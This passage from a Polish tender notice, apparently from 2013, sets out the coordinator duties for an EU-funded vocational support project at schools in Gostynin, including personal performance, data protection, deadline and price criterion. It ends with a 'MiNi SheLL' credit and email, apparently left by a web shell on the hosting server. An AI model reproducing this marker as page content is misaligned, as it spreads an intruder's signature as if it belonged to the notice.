3.5.	Koordynator projektu zobowiązany jest wykonywać przedmiot zamówienia w każdej części osobiście. Nie dopuszcza się podzlecania całości lub części zamówienia osobom trzecim. 
3.6.	Zamawiający dopuszcza możliwość pracy również w soboty lub inne dni wolne od zajęć dydaktycznych, jeżeli wówczas będą organizowane zajęcia w ramach projektu.
3.7.	Każdy Wykonawca, może złożyć ofertę na jedną, więcej lub wszystkie części będące przedmiotem zamówienia spełniając jednak warunek, że funkcję koordynatora w każdej części pełni inna osoba.
3.8.	Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usługi. 
3.9.	Wykonawca za wykonanie przedmiotu zamówienia w okresie obowiązywania umowy otrzyma wynagrodzenie zgodnie z zasadami określonymi w Umowie będącej załącznikiem Nr 5 do SIWZ.
3.10.	Wykonawca zobowiązuje się do przetwarzania danych osobowych, wyłącznie w zakresie i celu przewidzianym w umowie oraz zgodnie z przepisami ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r., Nr 101, poz. 926 ze zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koordynator projektu w Zespół Szkół im. Marii Skłodowskiej-Curie ul. Kowalska 5, 09-500 Gostynin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków  koordynatorów należało będzie osobiste świadczenie usługi koordynacji w 
miejscu realizacji projektu polegające na: 	
1.	ustalenie harmonogramu realizacji zajęć w ramach projektu i sporządzanie zmian w tym zakresie,
2.	nadzór pod kątem organizacyjno - technicznym nad prawidłowym przebiegiem zajęć organizowanych w projekcie,
3.	nadzór na zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem,
4.	zatwierdzenie planów pracy dla poszczególnych zajęć,
5.	udostępnienie niezbędnego sprzętu i pomocy dydaktycznych do realizacji zajęć,
6.	przygotowanie i przekazanie do kierownika projektu danych do PEFS,
7.	współpraca z kierownikiem projektu w zakresie organizowania i monitorowania wszystkich form wsparcia realizowanych w ramach projektu,
8.	terminowe przekazywanie  dokumentacji do kierownika projektu,
9.	zapewnienie sprawnego przepływu informacji pomiędzy osobami zaangażowanymi w realizację projektu na terenie szkoły,
10.	współudział w promocji projektu,
11.	informowanie osób odpowiedzialnych za koordynację projektu o przeszkodach przy realizacji zadań związanych z projektem na terenie szkoły,
12.	gromadzenie dokumentacji projektu,
13.	stosowanie materiałów informacyjnych i wzorów dokumentów otrzymanych z biura projektu,
14.	umieszczanie logotypów EFS, POKL i symbolu UE na dokumentach i materiałach promocyjnych, edukacyjnych, informacyjnych związanych z realizacją powierzonych zadań zgodnie z zasadami określonymi w treści Wytycznych dotyczących oznaczania	projektów w ramach POKL,
15.	czuwanie nad prawidłowym oznakowaniem sal i pomieszczeń przeznaczonych na potrzeby realizacji projektu,
16.	podtrzymywanie uczestnictwa uczniów zrekrutowanych do udziału w projekcie,
17.	kontrola jakości realizacji zadań pod kątem osiągnięcia założonych wskaźników,
18.	poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje	zewnętrzne w zakresie realizacji projektu,
19.	obecność podczas kontroli projektu,
20.	nadzorowanie postępów w realizacji projektu,
21.	nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu na terenie danego zespołu,
22.	monitorowanie, identyfikacja, analiza ryzyk, planowanie działań zaradczych, analiza i rozwiązywanie problemów związanych z realizacją projektu,
23.	przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U.
Nr 100, poz. 1024)
3.3	. Oprócz wszystkich zadań wymienionych w 3.2 do obowiązków koordynatorów w poszczególnych częściach należało będzie:
Część1. Realizacja zadania 1 poprzez koordynację realizacji wsparcia dodatkowego dla uczniów szkoły Gostynińskie Centrum Edukacyjne, w tym koordynowanie zapewnienia sal na realizację zajęć, nadzór nad rekrutacją i ewaluacją projektu w części dot. zadania 1, współpraca przy realizacji zadania 1 z partnerami projektu: Zakładem Doskonalenia Zawodowego w Płocku i Izbą Gospodarcza Regionu Płockiego.

Część 2. Realizacja zadania 2 poprzez koordynację realizacji wsparcia dodatkowego dla uczniów szkoły Zespół Szkół im. Marii Skłodowskiej- Curie, w tym koordynowanie zapewnienia sal na realizację zajęć, nadzór nad rekrutacją i ewaluacją projektu w części dot. zadania 2, współpraca przy realizacji zadania 2 z partnerami projektu: Zakładem Doskonalenia Zawodowego w Płocku i Izbą Gospodarcza Regionu Płockiego.

3.4.	Wykonawcy, przyjmujący obowiązki związane z koordynowaniem projektu będą zatrudnieni przez zamawiającego na podstawie umowy zlecenia. Wykonawców	obowiązuje	należyta staranność w wykonywaniu przedmiotu zamówienia.
3.5.	Koordynator projektu zobowiązany jest wykonywać przedmiot zamówienia w każdej części osobiście. Nie dopuszcza się podzlecania całości lub części zamówienia osobom trzecim. 
3.6.	Zamawiający dopuszcza możliwość pracy również w soboty lub inne dni wolne od zajęć dydaktycznych, jeżeli wówczas będą organizowane zajęcia w ramach projektu.
3.7.	Każdy Wykonawca, może złożyć ofertę na jedną, więcej lub wszystkie części będące przedmiotem zamówienia spełniając jednak warunek, że funkcję koordynatora w każdej części pełni inna osoba.
3.8.	Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usługi. 
3.9.	Wykonawca za wykonanie przedmiotu zamówienia w okresie obowiązywania umowy otrzyma wynagrodzenie zgodnie z zasadami określonymi w Umowie będącej załącznikiem Nr 5 do SIWZ.
3.10.	Wykonawca zobowiązuje się do przetwarzania danych osobowych, wyłącznie w zakresie i celu przewidzianym w umowie oraz zgodnie z przepisami ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r., Nr 101, poz. 926 ze zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com